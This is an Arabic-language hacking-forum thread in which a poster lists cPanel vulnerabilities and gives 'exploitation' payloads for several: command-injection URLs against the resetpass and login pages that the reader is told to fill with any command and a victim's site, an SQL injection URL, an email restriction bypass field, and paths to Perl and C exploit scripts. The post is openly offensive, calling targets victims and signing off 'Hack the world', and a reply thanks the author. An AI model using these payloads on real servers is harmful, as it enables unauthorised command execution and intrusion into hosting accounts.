cpanel vulnerability

[oldadmin]

السلام عليكم
ثغرات لوحات التحكم الخاصه بالمواقع
الكاتب/شاجع

يلا نبداء

من اقوى الثغرات
cPanel Resetpass Remote Command Execution Vulnerability

الاستثمار
كود:
http://www.example.com:2082/resetpass/?user=|">ls"|
حيث ls
هو امر استعراض الملفات انت تغيره الى اي امر

example موقع المراد اختراقه



الثغره الثانيه لكن ضعيفه

cPanel/Formail-Clone E-Mail Restriction Bypass Vulnerability

الاستثمار
كود:
The following proof of concept has been supplied:

<input type="hidden" name="recipient"
value="user1@offsitedomain.(localdomain)co
m, user2@offsitedomain.(localdomain)com">
^_^

الثغره الثالثه وهي قويه

cPanel Passwd Remote SQL Injection Vulnerability

الاستثمار
كود:
http://www.example.com:2086/******s/passwd?password=<>&domain=<>&user=<>
كووووووووووول




الثغره الرابعه

cPanel Login ****** Remote Command Execution Vulnerability


الاستثمار

كود:
http://www.example.com.com:2082/login/?user=|"`id`"|
حيث example موقع الضحيه ^_*


الثغره الخامسه

cPanel Guestbook.cgi Remote Command Execution Vulnerability

ثغراتها برمجيه
روح لى دوره شاجع في استثمار الثغرات البرمجيه
بلغة البيرل والسي

• /data/vulnerabilities/exploits/DSR-cpanel.c
• /data/vulnerabilities/exploits/cpanel-VH.pl
• /data/vulnerabilities/exploits/CPANEL.PL
• /data/vulnerabilities/exploits/jozc.pl

now
hackers

Hack the world

شاجع

 

[pc.pirate]

شكرا ل لك على الشرح الجميل أخي شاجع .

 

[oldadmin]

العفو اخي الكريم
رح اجيب المزيد